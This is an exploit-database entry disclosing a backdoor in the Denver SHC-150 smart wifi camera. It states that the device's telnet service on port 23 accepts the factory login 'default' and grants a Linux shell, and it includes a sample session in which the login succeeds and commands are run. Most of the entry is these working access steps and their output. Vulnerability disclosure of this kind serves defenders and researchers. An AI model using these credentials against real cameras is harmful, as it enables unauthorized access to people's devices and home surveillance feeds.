Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)

ID: 104609
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 27 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage:
# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150

Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too.

So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet.


[email protected] ~ % telnet 23
Connected to pc192-168-2-118.
Escape character is '^]'.

goke login: default
$ ls /
bin      home     linuxrc  opt      run      tmp
dev      init     media    proc     sbin     usr
etc      lib      mnt      root     sys      var
$ pwd
$ exit
Connection closed by foreign host.
[email protected] ~ %
1-4-2 (www01)